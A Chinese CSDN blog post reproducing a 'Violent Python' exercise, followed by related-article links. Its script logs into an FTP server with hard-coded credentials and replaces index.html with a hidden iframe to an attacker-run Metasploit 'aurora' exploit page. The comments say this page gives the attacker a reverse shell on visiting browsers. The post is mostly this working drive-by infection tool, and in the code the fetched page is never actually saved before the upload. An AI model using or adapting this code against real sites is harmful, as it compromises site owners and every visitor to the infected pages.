Violent Python FTP注入

最新推荐文章于 2024-04-28 21:39:45 发布
最新推荐文章于 2024-04-28 21:39:45 发布
阅读量292 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31017793/article/details/78984382
版权 
# coding=UTF-8
# time: 18-1-5: 下午3:14 
# Author: Xifeng2009
'''
在网页中加入恶意注入代码
找到网页文件后,必须用恶意重定向代码感染它们,
为了快速创建一个位于  http://10.10.10.112:8080/exploit  的恶意服务器和页面,
我们将使用Metasploit框架, 选择ms10_002_aurora
10.10.10.112:8080/exploit 上的网页会利用被重定向到这里的浏览器中的漏洞,
使之向我们提供一个反向连接,令我们能通过这个反向链接来控制这台肉鸡
'''
import ftplib


'''运行代码,下载index.html,并在其中注入恶意内容,并上传'''
def injectPage(ftp, page, redirect):


    f = open(page + '.tmp', 'w')                              # 下载FTP文件
    ftp.retrlines('RETR ' + page)
    print("[+] Downloaded Page: " + page)
    f.write(redirect)                                         # 写入恶意代码
    f.close()
    print("[+] Injected Malicious IFrame on " + page)
    ftp.storlines('STOR ' + page, open(page + '.tmp', 'rb'))  # 上传目标文件
    print("[+] Uploaded Injected Page: " + page)


host = '127.0.0.1'
userName = 'uftp'
passWord = 'uftp'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = "<iframe src='http://192.168.100.113:8080/exploit'></iframe>"
injectPage(ftp, 'index.html', redirect)

大西太兵卫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Violent Python
11-12
作为Python编程中非常重要的应用,Python在网络编程方面提供非常强大的支持,而Violent Python则更是彰显了脚本的力量
Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)漏洞复现
weixin_51804748的博客
01-17 1933
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
FTP暴力破解及恶意脚本注入
The Road Of Sec
10-10 3030
通过FTP连接WEB来渗透 检查受感染服务器的FTP日志。 一个自动的脚本连接到目标主机以确认它是否包含一个名为 index.htm 的默认主页。接下来攻击者上传了一个新的 index.htm 页面,可能包含恶意的重定向脚本。受感染的服务器渗透利用任何访问它页面的脆弱客户机。 可以利用 Pythonftplib 模块来构建一个小脚本,用来确认服务器是否允许匿名登录。函数 anonLogin(...
ftp系实战和ssl注入实战
weixin_51339377的博客
03-30 538
nmap进行扫描 发现目标开启的21号端口 ftp的服务 看到了ProFTPD 可以考虑一下使用一些其现成的漏洞 搜索漏洞库 我们也可以在msf中进行搜索 直接使用相应的漏洞即可 这是利用了一些软件的旧版本所存在的漏洞进行的提权 接下来是ssl注入实战 第一步正常nmap扫描 发现只开放了80端口 所以只能从web端入手了 后续发现网站url上是shtml 说明可能存在ssl注入的可能 使用nikto对其进行扫描 有可能存在ss...
Python 进行渗透测试
黑战士的博客
04-28 963
编写一个端口扫描器Python 提供了访问 BSD 套接字的接口Web 服务器可能位于 TCP 80 端口、电子邮件服务器在 TCP 25 端口、FTP 服务器在 TCP 21 端口TCP 全连接扫描为了抓取目标主机上应用的 Banner,找到开放的端口后,向它发送一个数据串并等待响应。
Violent Python 无水印pdf
10-05
Violent Python 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Violent Python 中文和代码
03-26
Violent Python 中文和代码
Violent Python中文版(全本)
12-18
Python提供了高效的开发平台来构建我们自己的攻击工具。如果你用的是Mac OS X或者是Linux系统,Python已经内置在你的系统中。丰富的攻击攻击已经存在,学习Python可以帮助你解决那些工具不能解决的问题。
Violent Python 中文版
04-13
Violent Python 中文版
基于matlab实现的空间调制通信过程,包含信号调制、天线选择等发送过程,以及采用最大似然估计的检测过程 .rar
最新发布
05-02
基于matlab实现的空间调制通信过程,包含信号调制、天线选择等发送过程,以及采用最大似然估计的检测过程。.rar
基于matlab的关于生猪养殖场经营管理的研究.docx
05-02
本文档是课题研究的研究报告内含调研以及源码设计以及结果分析
网络作为特征提取器-python源码.zip
05-02
网络作为特征提取器-python源码.zip
JavaScript-javaweb项目
05-02
JavaScript-javaweb项目
node-v12.11.0-linux-arm64.tar.xz
05-02
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
仿Slideby触屏版html5响应式手机wap网站模板下载.zip
05-02
触屏版自适应手机wap软件网站模板 触屏版自适应手机wap软件网站模板
node-v10.18.1-linux-arm64.tar.xz
05-02
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
IEC 60695-11-3:2012.pdf
05-02
IEC 60695-11-3:2012.pdf
2021-2010上市公司和讯网社会责任评级CSR-股东员工客户消费者环境社会责任分项评级
05-02
上市公司和讯网社会责任评级CSR-股东责任员工责任客户消费者环境社会责任分项评级 得分(2010-2021年) "中国上市公司-和讯网社会责任数据"是 一份来自和讯网的数据集,它同步并收集了中国上市公司关于社会责任的相关信息。包括了 公司在股东责任、员工责任、供应商客户消费者权益责任、环境责任、社会责任中的表现和 成绩,以反映公司承担社会责任的程度。可以帮助大家了解公司在承担社会责任方面的具体 表现。这对于研究公司社会责任与公司业绩、公司声誉、公司风险等方面的关系具有参考意 义。 一、数据介绍 数据名称:上市公司和讯网社会责任评级CSR-股东责任员工责任 客户消费者环境社会责任分项评级得分 数据年份:2010-2021年 样本数量:每 年含2300-4600左右上市公司数据,总数据量40058条(注:因披露口径原因 ,2021年仅有430+上市公司数据) 数据格式:Excel面板数据 二、指标说 明 共计11个指标:股票名称、股票代码、年份、总得分、等级、股东责任、员工责任、 供应商客户和消费者权益责任、环境责任、社会责任、统计日期 三、部分excel数据 展示
Python与网络安全
12-23
1. 《Violent Python》:这本书提供了一系列Python脚本和工具,用于黑客、法医分析师、渗透测试人员和安全工程师的活动。它详细介绍了如何使用Python进行网络安全任务。 2. 《Black Hat Python》:这本书专门面向...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值